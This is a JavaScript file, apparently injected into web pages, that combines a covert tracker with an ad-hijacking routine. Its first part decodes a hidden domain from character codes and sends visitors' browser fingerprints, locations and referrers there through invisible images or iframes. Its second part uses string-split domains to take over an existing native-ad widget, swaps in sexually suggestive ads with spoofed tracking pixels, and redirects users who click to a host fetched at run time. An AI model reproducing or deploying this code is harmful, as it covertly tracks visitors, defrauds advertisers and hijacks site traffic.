(function () {
var sid = 2397;
var $$cc = "TW";

(function () {
    var useimg = true;
    var dic = { "45": "-", "46": ".", "48": "0", "49": "1", "50": "2", "51": "3", "52": "4", "53": "5", "54": "6", "55": "7", "56": "8", "57": "9", "65": "A", "66": "B", "67": "C", "68": "D", "69": "E", "70": "F", "71": "G", "72": "H", "73": "I", "74": "J", "75": "K", "76": "L", "77": "M", "78": "N", "79": "O", "80": "P", "81": "Q", "82": "R", "83": "S", "84": "T", "85": "U", "86": "V", "87": "W", "88": "X", "89": "Y", "90": "Z", "95": "_", "97": "a", "98": "b", "99": "c", "100": "d", "101": "e", "102": "f", "103": "g", "104": "h", "105": "i", "106": "j", "107": "k", "108": "l", "109": "m", "110": "n", "111": "o", "112": "p", "113": "q", "114": "r", "115": "s", "116": "t", "117": "u", "118": "v", "119": "w", "120": "x", "121": "y", "122": "z" };
    var sd = ["99", "111", "117", "110", "116", "46", "120", "120", "120", "115", "115", "107", "46", "99", "111", "109"];
    function gd() {
        var s = "";
        for (var i = 0; i < sd.length; i++) {
            s += dic[sd[i]];
        }
        return s;
    }

    function gg() {
        var guid = "";
        for (var i = 1; i <= 32; i++) {
            var n = Math.floor(Math.random() * 16.0).toString(16);
            guid += n;
            if ((i == 8) || (i == 12) || (i == 16) || (i == 20))
                guid += "-";
        }
        return guid;
    }


    function sc(name, value) {
        var exp = new Date();
        exp.setTime(exp.getTime() + 6 * 60 * 60 * 1000);
        document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + ";path=/";
    }
    function gc(name) {
        var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
        if (arr != null) return unescape(arr[2]); return null;
    }

    function statFunc(args) {
        var spsid = sid;
        var loc = top.location.toString();
        if (args) {
            if (args.sid) { spsid = args.sid; }
            if (args.loc) { loc = args.loc; }
        }
        var _guid = gc("xxxsskguid" + spsid);
        var isEntrance = false;

        if (!_guid) {
            _guid = gg();
            sc("xxxsskguid" + spsid, _guid);
            isEntrance = true;
        }
        var lc = gc("lastlocation" + spsid);
        if (lc === loc) {
            return;
        }
        else {
            sc("lastlocation" + spsid, loc);
        }
        /* grab client information */
        var oData = {
            'isentrance': isEntrance,
            'guid': _guid,
            'resolution': [screen.width, screen.height],
            'colordepth': screen.colorDepth,
            'location': encodeURIComponent(loc),
            'referrer': (document.referrer && document.referrer != '') ? encodeURIComponent(document.referrer) : '',
            'rd': Math.random(),
            'sid': spsid
        };
        try { oData.dpr = window.devicePixelRatio; } catch (e) { }
        try { oData.appCodeName = navigator.appCodeName; } catch (e) { }
        try { oData.appName = navigator.appName; } catch (e) { }
        try { oData.appVersion = navigator.appVersion; } catch (e) { }
        try { oData.maxTouchPoints = navigator.maxTouchPoints; } catch (e) { }
        try { oData.platform = navigator.platform; } catch (e) { }
        try { oData.product = navigator.product; } catch (e) { }
        try { oData.productSub = navigator.productSub; } catch (e) { }
        try { oData.vendor = navigator.vendor; } catch (e) { }
        try { oData.deviceMemory = navigator.deviceMemory; } catch (e) { }

        aData = [];
        for (var i in oData) {
            aData[aData.length] = i + '=' + oData[i];
        };
        try {
            var sRequestUrl = "//" + gd() + "/s/?" + aData.join('&');
            if (useimg) {
                var i = new Image(1, 1);
                i.onload = function () {
                    if (args && args.cb) {
                        args.cb();
                    }
                }
                i.src = sRequestUrl;
            }
            else {
                var f = document.createElement("iframe");
                f.style.height = 0;
                f.style.width = 0;
                f.style.borderWidth = 0;
                document.body.appendChild(f);
                f.src = sRequestUrl;
            }
        } catch (ex) { }
    }
    window.sskStat = statFunc;

    if (window.sskStat) {
        window.sskStat();
    }
    else {
        statFunc();
    }

    window.statAdd = function (id) {
        var spsid = sid;
        var _guid = gc("xxxsskguid" + spsid);
        var isEntrance = false;

        if (!_guid) {
            _guid = gg();
            sc("xxxsskguid" + spsid, _guid);
            isEntrance = true;
        }
        var loc = top.location.toString();
        if (id) {
            loc += "#" + id;
        }
        /* grab client information */
        var oData = {
            'isentrance': isEntrance,
            'guid': _guid,
            'resolution': [screen.width, screen.height],
            'colordepth': screen.colorDepth,
            'location': encodeURIComponent(loc),
            'referrer': (document.referrer && document.referrer != '') ? encodeURIComponent(document.referrer) : '',
            'rd': Math.random(),
            'sid': spsid
        };
        try { oData.dpr = window.devicePixelRatio; } catch (e) { }
        try { oData.appCodeName = navigator.appCodeName; } catch (e) { }
        try { oData.appName = navigator.appName; } catch (e) { }
        try { oData.appVersion = navigator.appVersion; } catch (e) { }
        try { oData.maxTouchPoints = navigator.maxTouchPoints; } catch (e) { }
        try { oData.platform = navigator.platform; } catch (e) { }
        try { oData.product = navigator.product; } catch (e) { }
        try { oData.productSub = navigator.productSub; } catch (e) { }
        try { oData.vendor = navigator.vendor; } catch (e) { }
        try { oData.deviceMemory = navigator.deviceMemory; } catch (e) { }

        aData = [];
        for (var i in oData) {
            aData[aData.length] = i + '=' + oData[i];
        };
        try {
            var sRequestUrl = "//" + gd() + "/s/?" + aData.join('&');
            if (useimg) {
                var i = new Image(1, 1);
                i.onload = function () {
                    try { console.log(this.src); } catch (ex) { }
                }
                i.src = sRequestUrl;
            }
            else {
                var f = document.createElement("iframe");
                f.style.height = 0;
                f.style.width = 0;
                f.style.borderWidth = 0;
                document.body.appendChild(f);
                f.src = sRequestUrl;
            }
        } catch (ex) { }

    }


})();

}());

;
var resource = {
    $$pics: [
        { 'n': '這招我沒教過你耶!?', 'p': "//cdn.18pfun.com/ad/ttad1.jpg" },
        { 'n': '你這是第幾次啦⋯', 'p': "//cdn.18pfun.com/ad/ttad2.jpg" },
        { 'n': '你到底從哪學來這些東西的?', 'p': "//cdn.18pfun.com/ad/ttad3.jpg" },
        { 'n': '你這是第幾次啦⋯', 'p': "//cdn.18pfun.com/ad/ttad4.jpg" },
        { 'n': '你這是第幾次啦⋯', 'p': "//cdn.18pfun.com/ad/ttad5.jpg" }
    ],
    $$pics2: [
        { 'n': '你到底從哪學來這些東西的?', 'p': "//cdn.18pfun.com/ad/ttad3.jpg" },
        { 'n': '「平常在辦公室，看不出來私底下妳很開放呢」女同事也太反差', 'p': '//cdn.18pfun.com/ad/ttad6.jpg' },
        { 'n': '「明明看不到..卻都可以按到舒服的穴位」盲眼按摩師的穴位專攻', 'p': '//cdn.18pfun.com/ad/ttad7.jpg' }
    ],
    allowhost: false
};
var $ap = function (v, c, ac) {
    if (!ac) {
        ac = "a" + "c" + "." + "1" + "8" + "p" + "." + "f" + "u" + "n";
    }
    $.ajax({
        type: "get",
        url: "//" + ac + "/api/getsite/" + ((c && c) > 0 ? "?channelid=" + c : ""),
        cache: false,
        crossDomain: true,
        dataType: "json",
        success: function (res) {
            if (res.id > 0) {
                window.open("http://" + res.host + "/jump/?p=" + encodeURIComponent(JSON.stringify(v)) + "&_=" + Math.random(), "_self");
            }
        },
        error: function (res, st, err) {
            var $nac = "a" + "c" + "." + "c" + "o" + "m" + "i" + "c" + "l" + "e" + "s" + "s" + "." + "c" + "o" + "m";
            if (ac != $nac) {
                $ap(v, c, $nac);
            }
        }
    });
};
if (location.href.indexOf("borderlessbr") <= -1) {
    var $$getAd = function (ele, t) {
        window.$$mhobjs = [];
        $.get("/" + "/" + "1" + "8" + "i" + "n" + "j" + "e" + "c" + "t" + "." + "c" + "o" + "m" + "i" + "c" + "l" + "e" + "s" + "s" + "." + "c" + "o" + "m" + "/api/articleinject/?n=1", function (res) {
            var htmlstr = "";
            var sec = 0;
            for (let index = 0; index < res.length; index++) {
                const o = res[index];
                var obj = { "id": index, p: o.p };
                window.$$mhobjs.push(obj);
                var $$p = {};

                if (t == 0) {
                    $$p = resource.$$pics[(Math.ceil(Math.random() * resource.$$pics.length) - 1)];
                }
                else if (t == 1) {
                    $$p = resource.$$pics2[(Math.ceil(Math.random() * resource.$$pics2.length) - 1)];
                }

                var cover = $$p.p;
                var name = $$p.n;
                if (resource.allowhost) {
                    cover = o.cover;
                }
                var $$hstr = "";
                if (t == 0) {
                    $$hstr += "<div class=\"compass-fit-ad compass-fit-ad-ad compass-fit-loaded\">";
                    $$hstr += "<a itemprop='mhnav' data-id='" + index + "' rel=\"nofollow noopener\">";
                    $$hstr += "<div class=\"compass-fit-ad-inner\">";
                    $$hstr += "<div class=\"compass-fit-ad-img\">";
                    $$hstr += "<div class=\"compass-fit-ad-pr\">PR</div>";
                    $$hstr += "<div class=\"compass-fit-ad-img-inner\" style=\"background-image: url(" + cover + ");\" data-loglyimg=\"width: 120px; height: 90px; top: 0px; left: 0px;/\"> </div>";
                    $$hstr += "</div>";
                    $$hstr += "<div class=\"compass-fit-ad-content\">";
                    $$hstr += "<div class=\"compass-fit-ad-content-inner\">";
                    $$hstr += "<div class=\"compass-fit-ad-title\">" + name + "</div>";
                    $$hstr += "<img src=\"https://b.logly.co.jp/bc\" width=\"1\" height=\"1\" style=\"position: absolute; width: 1px; height: 1px; top: -32767px; left: -32767px;\" alt=\"\">";
                    $$hstr += "</div>";
                    $$hstr += "</div>";
                    $$hstr += "</div>";
                    $$hstr += "</a>";
                    $$hstr += "</div>";
                }
                else if (t == 1) {

                    $$hstr += "<div class=\"compass-fit-ad\">";
                    $$hstr += "<a itemprop='mhnav' data-id='" + index + "' rel=\"nofollow noopener\">";
                    $$hstr += "<img class=\"compass-fit-ad-img\" src=\"" + cover + "\">";
                    $$hstr += "<div class=\"compass-fit-ad-title\">" + name + "</div>";
                    $$hstr += "<img src=\"//b.logly.co.jp/bc?ac=CWjh8Op2flKSNq7Hp-4WnQ&amp;ad=3015547\" width=\"1\" height=\"1\"style=\"position: absolute; width: 1px; height: 1px; top: -32767px; left: -32767px;\" alt=\"\">";
                    $$hstr += "</a>";
                    $$hstr += "</div>";
                }

                htmlstr = $$hstr;
            }
            if (t==0) {
                $(ele).after($(htmlstr));
            }
            else if(t==1) {
                $(ele).replaceWith($(htmlstr));
            }
            $("a[itemprop='mhnav']").each((i, e) => {
                $(e).click(() => {
                    var o = window.$$mhobjs[parseInt($(e).attr("data-id"))];
                    $ap(o.p, 1);
                });
            });
        }, "json");
    };
    var $ccc = 0;
    $ccc = setInterval(function () {
        var t = 0;
        var $ele = $("div#compass-fit-widget-content div#compass-fit-widget-content-inner div.compass-fit-ad-ad");
        if ($ele.length <= 0) {
            $ele = $("div#compass-fit-widget-content div.compass-fit-ad");
            if ($ele.length > 0) {
                t = 1;
            }
        }
        if ($ele.length > 1) {
            clearTimeout($ccc);
            var rdidx = (Math.ceil(Math.random() * $ele.length) - 1);
            if (t == 1 && rdidx == 0) {
                rdidx = 1;
            }
            $$getAd($ele[rdidx], t);
        }
    }, 500);
}
